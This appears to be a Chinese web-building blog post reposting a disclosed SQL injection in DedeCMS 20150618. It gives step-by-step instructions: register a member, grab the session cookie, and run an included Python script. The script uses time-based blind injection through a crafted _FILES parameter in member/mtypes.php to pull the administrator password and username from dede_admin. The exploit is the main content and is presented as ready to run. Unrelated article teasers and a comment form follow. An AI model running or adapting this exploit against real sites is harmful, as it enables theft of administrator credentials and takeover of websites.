Dedecms 20150618 注入漏洞(可注入管理员账户)

网站建设评论77

漏洞地址:http://www.wooyun.org/bugs/wooyun-2015-0127787需要修改的地方是cookie ,因为是会员中心的注入首先要能注册,注册完成后添加一个分类如图Dedecms 20150618 注入漏洞(可注入管理员账户)在地址栏输入 javascript:document.write(document.cookie);   得到自己的cookieDedecms 20150618 注入漏洞(可注入管理员账户)得到的cookie 替换脚本中的cookieDedecms 20150618 注入漏洞(可注入管理员账户)就可以愉快的跑密码了Dedecms 20150618 注入漏洞(可注入管理员账户)跑用户名只需要把脚本中的pwd 换成uname就OK了import urllib2import timeopener = urllib2.build_opener()opener.addheaders.append((\'Cookie\', \'PHPSESSID=thr71ua1g91j9d5lf79tr70ri1; DedeUserID=2; DedeUserID__ckMd5=6425e9e8f081fd4b; DedeLoginTime=1450059059; DedeLoginTime__ckMd5=0cae1010080d973a; last_vtime=1449818368; last_vtime__ckMd5=a8cc9e405d9da0bd; last_vid=tmdsb; last_vid__ckMd5=c6de842f1764c614\'))payloads = \'abcdefghijklmnopqrstuvwxyz0123456789@_.\'name = \"\"
 
for i in range(1,21):
 
    for p in payloads:
 
        s1 = \"%s\" %(i)        s2 = \"%s\" %(ord(p))
 
        s = \"http://localhost/d2/member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a\'%20and%20`\'`.``.mtypeid%20or%20if(ascii(substr((select%20pwd%20from%20dede_admin%20limit%201),\"+s1+\",1))%3d\"+s2+\",sleep(3),0)%20and%20mtypeid%3d1%23]=w&_FILES[mtypename][size]=.xxxx\"
 
        start_time = time.time()
         try: 
            req = urllib2.Request(s)
                        
            req_data=opener.open(req,timeout=10)
 
            if time.time() - start_time > 2.0:
 
                name = name+p
 
                print name+\'.....\'
         except urllib2.URLError,e:
 
             break
 
print \'password is %s\'  % name

 

 
高端网站建设的路为什么越来越难走? 网站建设

高端网站建设的路为什么越来越难走?

很早之前元大人曾经写过一遍文章《识别“定制网站”后的智能建站》,现在智能建站也越来越多了,相反高端网建公司越来越少,路也越来越难走,这点元大人是深有感触。元大人认为究其原因无非在于以下几点: 1.网建...
怎样去设计一个高转化的详情页 网站建设

怎样去设计一个高转化的详情页

详情页设计是有逻辑可循的,所以,接下来就给大家说一说详情页的设计的一些原则性的问题吧!这些问题更多的是从逻辑上着手,而不是从视觉美观的角度去着手!第一:首屏聚焦原则简单的理解,就是第一屏一定要能够吸引...
外链建设的目标 网站建设

外链建设的目标

建设外链是目前网站优化中,对排名提升效果非常有用的手段,所以为了做好外链优化工作,了解外链建设的目标是很有必要的。我们知道一个现象就是谷歌炸弹( Google Bombing),谷歌炸弹就是利用大量的...
匿名

发表评论

匿名网友
:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: